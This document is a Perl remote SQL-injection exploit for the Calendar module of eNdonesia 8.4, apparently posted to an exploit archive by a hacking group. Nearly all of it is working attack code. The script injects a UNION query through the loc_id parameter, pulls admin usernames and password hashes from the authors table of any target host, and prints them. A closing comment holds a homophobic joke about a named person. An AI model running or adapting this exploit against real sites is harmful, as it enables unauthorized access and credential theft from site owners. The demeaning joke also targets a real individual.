eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

#/-----------------------------------------------

#| /----------------------------------------- |

#| | Remote SQL Exploit | |

#| | eNdonesia 8.4 Remote SQL Exploit | |

#| | www.endonesia.org | |

#| | Calendar Module | |

#| -----------------------------------------/ |

#| /----------------------------------------- |

#| | Presented By Jack | |

#| | MainHack Enterprise | |

#| | www.MainHack.com & irc.nob0dy.net | |

#| | #MainHack #nob0dy #BaliemHackerlink | |

#| | Jack[at]MainHack[dot]com | |

#| -----------------------------------------/ |

#| /----------------------------------------- |

#| | Hello To: Indonesian h4x0r | |

#| | yadoy666,n0c0py & okedeh | |

#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | |

#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |

#| | all MainHack BrotherHood | |

#| -----------------------------------------/ |

#-----------------------------------------------/

use HTTP::Request;

use LWP::UserAgent;

$sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id=";

$sql_injection = "-999/**/union select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where name pwd";

if(!@ARGV) { &help;exit(1);}

sub help(){

print "n [?] eNdonesia 8.4 Remote SQL Exploitn";

print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=n";

print " [?] Use : perl $0 www.target.comn";

print " [?] Dont use "http://"n";

print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=n";

print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood nn";

print " [?] www.MainHack.comnn";

}

while (){

my $target = $ARGV[0];

my $exploit = "http://".$target.$sql_vulnerable.$sql_injection;

print "n [-] Trying to inject $target ...nn";

my $request = HTTP::Request->new(GET=>$exploit);

my $useragent = LWP::UserAgent->new();

$useragent->timeout(10);

my $response = $useragent->request($request);

if ($response->is_success){

my $res = $response->content;

if ($res =~ m/>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {

my ($username,$passwd) = ($1,$2);

print " [target] $target n";

print " [loginx] $username:$passwd nn";

exit(0);

}

else {

die " [error] Fail to get username and password.nn";

}

}

else {

die " [error] Fail to inject $target nn";

}

}

#/----------------------------------------------------------------

#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay |

#| namun mari kita perhatikan secara seksama ... |

#| NoGay merupakan kependekan dari NoGe is Gay. |

#| Sungguh, penyembunyian sebuah karakter di balik makna kata. |

#----------------------------------------------------------------/

#Vendor Has been contacted and now working for it.